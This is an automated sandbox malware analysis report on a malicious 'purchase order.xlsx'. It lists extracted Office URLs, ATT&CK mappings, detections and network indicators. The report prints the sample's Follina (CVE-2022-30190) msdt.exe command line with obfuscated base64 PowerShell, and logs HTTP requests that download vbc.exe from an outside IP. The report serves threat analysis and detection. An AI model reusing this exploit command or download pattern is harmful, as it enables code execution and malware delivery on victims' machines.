          https://inclient.store.office.com/gyro/clientstore
          https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
          https://insertmedia.bing.office.net/odc/insertmedia
          https://invites.office.com/
          https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
          https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
          https://lifecycle.office.com
          https://login.microsoftonline.com/
          https://login.windows-ppe.net/common/oauth2/authorize
          https://login.windows.local
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
          https://login.windows.net/common/oauth2/authorize
          https://loki.delve.office.com/api/v1/configuration/officewin32/
          https://lookup.onenote.com/lookup/geolocation/v1
          https://management.azure.com
          https://management.azure.com/
          https://messaging.action.office.com/
          https://messaging.action.office.com/setcampaignaction
          https://messaging.action.office.com/setuseraction16
          https://messaging.lifecycle.office.com/
          https://messaging.lifecycle.office.com/getcustommessage16
          https://messaging.office.com/
          https://metadata.templates.cdn.office.net/client/log
          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          https://ncus.contentsync.
          https://ncus.pagecontentsync.
          https://o365auditrealtimeingestion.manage.office.com
          https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officeapps.live.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://osi.office.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://otelrules.azureedge.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://roaming.edog.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://settings.outlook.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://tasks.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: global traffic | HTTP traffic detected:
            GET /shipping_invc/document.html HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: 172.245.119.48
            Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
            GET /870/vbc.exe HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: 172.245.119.48
            Connection: Keep-Alive

        System Summary

        Source: Screenshot number: 4 | Screenshot OCR: enable Editing and Content from the Yellow bar 18" ~ A above to view locked content. 19" pm 20 2
        Source: DiagPackage.dll.13.dr | Static PE information: No import functions for PE file found
        Source: DiagPackage.dll.mui.13.dr | Static PE information: No import functions for PE file found
        Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 (date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20)
        Source: 0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 (date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20)
        Source: Process Memory Space: msdt.exe PID: 6596, type: MEMORYSTR | Matched rule: SUSP_PS1_Msdt_Execution_May22 (date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20)
        Source: DiagPackage.dll.13.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (reported 3 times)
        Source: purchase order.xlsx | ReversingLabs: Detection: 17%
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll (reported 8 times)
        Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'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'+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
        Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{25D11404-BE86-4B00-8632-AD71AC6E433D} - OProcSessId.dat
        Source: classification engine | Classification label: mal68.expl.winXLSX@10/24@0/1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
        Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next (reported 14 times)
        Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created (dropped file): C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created (dropped file): C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dll
        Source: C:\Windows\SysWOW64\msdt.exe | File created (dropped file): C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui
        Source: C:\Windows\SysWOW64\msdt.exe | File created (dropped file): C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (reported 43 times)
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOOPENFILEERRORBOX (reported 6 times)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exe | Window / User API: threadDelayed 812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'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'+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
        Source: C:\Windows\SysWOW64\msdt.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        MITRE ATT&CK matrix, listed per tactic (a number in parentheses is the count of matched signatures shown next to that technique in the matrix):

        • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
        • Execution: Command and Scripting Interpreter (1); Exploitation for Client Execution (12); At (Linux); At (Windows)
        • Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
        • Privilege Escalation: Process Injection (11); Extra Window Memory Injection (1); Logon Script (Windows); Logon Script (Mac)
        • Defense Evasion: Masquerading (11); Disable or Modify Tools (1); Process Injection (11); Extra Window Memory Injection (1)
        • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
        • Discovery: Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (13); System Network Configuration Discovery
        • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
        • Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
        • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
        • Command and Control: Non-Application Layer Protocol (1); Application Layer Protocol (21); Ingress Tool Transfer (11); Protocol Impersonation
        • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
        • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
        • Impact: Modify System Partition; Device Lockout; Delete Device Data
        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Antivirus detection for the submitted file:

        | Source | Detection | Scanner | Label |
        |---|---|---|---|
        | purchase order.xlsx | 17% | ReversingLabs | Document-Office.Exploit.CVE-2017-0199 |

        Antivirus detection for dropped files:

        | Source | Detection | Scanner | Label |
        |---|---|---|---|
        | C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll | 0% | Metadefender | |
        | C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll | 0% | ReversingLabs | |
        | C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui | 0% | Metadefender | |
        | C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        No contacted domains info
        Contacted URLs:

        | Name | Malicious | Antivirus Detection | Reputation |
        |---|---|---|---|
        | http://172.245.119.48/870/vbc.exe | false | Avira URL Cloud: safe | unknown |
        | http://172.245.119.48/shipping_invc/document.html | false | Avira URL Cloud: safe | unknown |
                                                                                                                                            https://graph.windows.net/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://api.powerbi.com/beta/myorg/imports34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://devnull.onenote.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://messaging.action.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://ncus.pagecontentsync.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://messaging.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                          high
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 172.245.119.48 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false |
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 653502
Start date and time: 2022-06-28 10:43:18 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 9s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: purchase order.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal68.expl.winXLSX@10/24@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .xlsx
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.109.32.24, 52.109.76.34, 52.109.88.37, 20.54.89.106, 52.242.101.226, 52.152.110.14, 20.223.24.244
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: purchase order.xlsx
                                                                                                                                                          No simulations
| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| 172.245.119.48 | 277.xlsx | malicious | 172.245.119.48/277/vbc.exe |
| | PO 009_011.xlsx | malicious | 172.245.119.48/134/vbc.exe |
| | purchase order.xlsx | malicious | 172.245.119.48/233/vbc.exe |
                                                                                                                                                          No context
| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| AS-COLOCROSSINGUS | sipariş S.A.xlsx | malicious | 192.227.168.194 |
| | NMB Transaction Advice Slip.xlsx | malicious | 198.12.81.50 |
| | Payment Slip.xlsx | malicious | 192.227.168.194 |
| | PO 28.06.2022.xlsx | malicious | 104.168.33.68 |
| | Ponudba_688459439674636.xlsx | malicious | 192.227.168.194 |
| | CO357787.xlsx | malicious | 192.227.168.194 |
| | Enquiry.xlsx | malicious | 198.12.91.239 |
| | gZHoNqzhnkAsyncnew.js | malicious | 104.168.33.53 |
| | DME.png.docx | malicious | 192.3.13.67 |
| | shipping document.xlsx | malicious | 192.227.168.194 |
| | fddaeygXLjAsync.js | malicious | 104.168.33.53 |
| | Shipping documents for PO 810884.exe | malicious | 192.3.245.147 |
| | 56.xlsx | malicious | 198.12.81.47 |
